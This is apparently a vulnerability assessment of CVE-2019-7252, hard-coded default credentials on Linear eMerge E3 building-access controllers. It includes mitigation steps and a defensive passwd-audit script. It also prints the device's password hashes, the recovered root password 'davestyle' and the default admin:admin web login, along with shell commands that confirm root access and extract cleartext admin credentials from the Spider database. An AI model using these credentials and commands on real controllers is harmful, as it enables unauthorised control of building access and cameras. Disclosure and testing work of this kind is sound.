Attacker Value: Very High (1 user assessed)
Exploitability: Very High (1 user assessed)
User Interaction: None
Privileges Required: None
Attack Vector: Network

CVE-2019-7252

Disclosure Date: July 02, 2019
MITRE ATT&CK tactics: Credential Access (validated), Initial Access (validated)

Description

Linear eMerge E3-Series devices have Default Credentials.

Technical Analysis

In my article cve-2019-7256 at attackerkb.com, I already elaborated on the security risks and vulnerabilities that still exist on the Linear eMerge E3 access controller.
Besides the RCE vulnerabilities, default credentials also exist within the vulnerable configuration that can easily be leveraged to gain privileged access to the system.

There are two significant vulnerabilities:
The first one is based on a default root password that is stored in /etc/passwd and is available on the vulnerable configuration. This can be used to escalate to root privileges using the RCE vulnerability CVE-2019-7256, or to use these credentials in combination with ssh (if enabled) to get root access to the access controller.
The second credential vulnerability allows an unauthenticated malicious actor to obtain the web credentials for the user admin from the spider database, which is world-readable on the access controller. With this access, the malicious actor is able to control the Linear eMerge E3 access platform, the access to the building and its cameras, and has the authority to manage the access rights of users.

Let's quickly demonstrate both vulnerabilities…

We assume that we have already gained access to the system using the RCE described in CVE-2019-7256.

ls -l /etc/passwd
-rwxr--r--    1 e3user   linear         733 Nov 13  2012 /etc/passwd
cat /etc/passwd
root:$1$VVtYRWvv$gyIQsOnvSv53KQwzEfZpJ0:0:100:root:/root:/bin/sh
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0:operator:/root:
games:x:12:100:games:/usr/games:
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP User:/home/ftp:
nobody:x:99:99:Nobody:/home/default:
e3user:$1$vR6H2PUd$52r03jiYrM6m5Bff03yT0/:1000:1000:Linux User,,,:/home/e3user:/bin/sh
lighttpd:$1$vqbixaUx$id5O6Pnoi5/fXQzE484CP1:1001:1000:Linux User,,,:/home/lighttpd:/bin/sh

As you can see, the default root password hash is stored directly in /etc/passwd and is world-readable. Normally, these password hashes are stored in an /etc/shadow file that is only readable by root. With this configuration, it is very easy to retrieve the hash and run a dictionary or brute-force attack, for instance with hashcat, to recover the password. And do not worry, somebody did this job already in 2019 ;–) –> davestyle.

To test if the root default password is available…

echo davestyle | su -c whoami
root

The second credential vulnerability can be exploited by querying the spider access controller database which has the user and password information stored in clear text.

This database resides in /tmp/SpiderDB/Spider.db and with the command below you can very easily retrieve the admin web credentials.

grep "Controller" /tmp/SpiderDB/Spider.db |cut -f 5,6 -d ',' |grep ID
ID='admin',Password='xxxxxxx'

And if this is not successful, you can always try the default web credential setting admin:admin.

Another Metasploit module to test the availability of the default root password and leak the admin web credentials has been submitted to the Metasploit mainstream.

Mitigation

Change the default root password on your access controller.
Update your Linear eMerge E3 access controller to a version higher than 1.00-06.
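As an added defender-side check (not part of this assessment, and not Linear's or Metasploit's code), the following POSIX shell script audits a passwd(5) file for the two conditions shown in the listing above: password hashes kept inline instead of in /etc/shadow, and world-readable permissions. The sample file it builds when run without a path is constructed, with made-up hash values.

```shell
#!/bin/sh
# Added audit example: sh audit_passwd.sh /etc/passwd
# Reports accounts whose password field holds a hash (should be "x" with the
# hash in /etc/shadow) and warns when the file is readable by everyone.

# Print "user:hashtype" for every account whose password field holds a hash.
# "x" (shadowed), "*", "!" and "!!" (locked) are not hashes; an empty field
# means no password at all and is reported as "empty".
unshadowed_accounts() {
    awk -F: '
        $2 == "x" || $2 == "*" || $2 == "!" || $2 == "!!" { next }
        $2 == ""            { print $1 ":empty"; next }
        $2 ~ /^\$1\$/       { print $1 ":md5crypt"; next }   # fast to crack, as noted above
        $2 ~ /^\$5\$/       { print $1 ":sha256crypt"; next }
        $2 ~ /^\$6\$/       { print $1 ":sha512crypt"; next }
        $2 ~ /^\$2[aby]?\$/ { print $1 ":bcrypt"; next }
                            { print $1 ":other" }
    ' "$1"
}

# Succeeds when the "other" read bit (8th character of ls -l output) is set,
# the condition that exposed the hashes in the device listing above.
world_readable() {
    mode=$(ls -ld "$1" | cut -c8)
    [ "$mode" = "r" ]
}

# Constructed sample modelled on the device listing (hash values are made up).
sample_passwd() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
root:$1$EXAMPLEHASH$abcdefghijklmnopqrstuv:0:100:root:/root:/bin/sh
bin:x:1:1:bin:/bin:
nobody:*:99:99:Nobody:/home/default:
e3user:$1$EXAMPLEHASH$abcdefghijklmnopqrstuv:1000:1000:Linux User,,,:/home/e3user:/bin/sh
EOF
    chmod 644 "$f"
    printf '%s\n' "$f"
}

if [ $# -eq 1 ]; then
    unshadowed_accounts "$1"
    world_readable "$1" && echo "WARNING: $1 is world-readable"
fi
```

On the sample, root and e3user are reported as md5crypt and the file is flagged world-readable; a correctly shadowed system produces no account lines.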

References

Nortek Linear eMerge E3-Series 1.00-06 Multiple Vulnerabilities (Packet Storm)

Credits

Credit goes to the security researcher below, who discovered these vulnerabilities.
Gjoko ‘LiquidWorm’ Krstic

CVSS V3 Severity and Metrics
Base Score: 9.8 Critical
Impact Score: 5.9
Exploitability Score: 3.9
Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): None
User Interaction (UI): None
Scope (S): Unchanged
Confidentiality (C): High
Integrity (I): High
Availability (A): High

General Information

Vendors

  • nortekcontrol

Products

  • linear emerge elite firmware,
  • linear emerge essential firmware
